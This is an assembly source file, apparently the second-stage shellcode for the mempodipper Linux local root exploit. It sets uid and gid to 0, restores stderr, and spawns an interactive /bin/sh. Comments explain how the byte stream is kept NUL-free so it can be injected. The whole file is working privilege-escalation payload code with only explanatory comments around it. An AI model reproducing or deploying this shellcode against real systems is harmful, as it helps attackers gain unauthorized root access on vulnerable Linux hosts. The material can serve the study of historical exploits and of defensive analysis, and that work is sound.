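BITS 64
; Second-stage payload for zx2c4's mempodipper exploit (NASM, Intel syntax,
; Linux x86-64 syscall ABI: nr in rax, args in rdi/rsi/rdx, rcx and r11
; clobbered by `syscall`, return value / -errno in rax).
;
; What it does, in order:
;   1. setuid(0), setgid(0)  -- become root.  Both only succeed if the hijacked
;      process already has euid 0; on failure (-EPERM in rax) the shell is still
;      exec'd, just without root.
;   2. dup2(6, 2)            -- the exploit saved the original stderr on fd 6
;      before transferring control here; this puts it back so the interactive
;      shell's prompt and diagnostics are visible.  If fd 6 is not open, dup2
;      fails and stderr stays where the exploit left it.
;   3. execve("/bin/sh", ["/bin/sh", "-i", NULL], NULL)
;
; Fix vs. the original listing: the syscall number was written with `mov al`
; on top of whatever rax held, so it depended on rax being zero at entry and on
; the previous syscall having returned 0.  A failed setuid (rax = -EPERM) turned
; the following setgid/dup2 numbers into garbage.  Every number is now written
; in full with `push imm8 / pop rax`, and every argument register is zeroed
; before its low byte is set, so no register state is assumed on entry.
; The byte stream remains free of NUL bytes (imm8 push/pop, 8-bit register
; moves, string immediates) like the original.
;
; by zx2c4

SYS_DUP2        equ 0x21
SYS_EXECVE      equ 0x3b
SYS_SETUID      equ 0x69
SYS_SETGID      equ 0x6a

SAVED_STDERR_FD equ 6               ; where the exploit parked the real stderr
STDERR_FD       equ 2

; setuid(0)
        push    SYS_SETUID
        pop     rax                     ; full 64-bit write: no stale high bytes
        xor     edi, edi                ; uid = 0 (32-bit xor zero-extends rdi)
        syscall

; setgid(0)
        push    SYS_SETGID
        pop     rax
        xor     edi, edi                ; gid = 0
        syscall

; dup2(SAVED_STDERR_FD, STDERR_FD)
        push    SYS_DUP2
        pop     rax
        xor     edi, edi
        mov     dil, SAVED_STDERR_FD    ; oldfd = 6 (byte move keeps the encoding NUL-free)
        xor     esi, esi
        mov     sil, STDERR_FD          ; newfd = 2
        syscall

; execve("/bin/sh", ["/bin/sh", "-i", NULL], NULL)
; The strings are built on the stack so the payload is position-independent.
        mov     qword rbx, '//bin/sh'   ; 8-byte immediate, little-endian: '/' is the low byte
        shr     rbx, 8                  ; drop the leading '/'; the vacated top byte is the NUL terminator
        push    rbx
        mov     rdi, rsp                ; rdi = "/bin/sh" (arg 1: filename)
        xor     ebx, ebx
        mov     bx, '-i'                ; rbx = "-i" followed by zero bytes
        push    rbx
        mov     rcx, rsp                ; rcx = "-i"; set after the last syscall above, since syscall clobbers rcx
        xor     edx, edx                ; rdx = NULL (arg 3: envp) and the argv terminator
        push    rdx                     ; argv[2] = NULL   (highest address)
        push    rcx                     ; argv[1] = "-i"
        push    rdi                     ; argv[0] = "/bin/sh" (lowest address = start of array)
        mov     rsi, rsp                ; rsi = argv (arg 2)
        push    SYS_EXECVE
        pop     rax
        syscall                         ; does not return on success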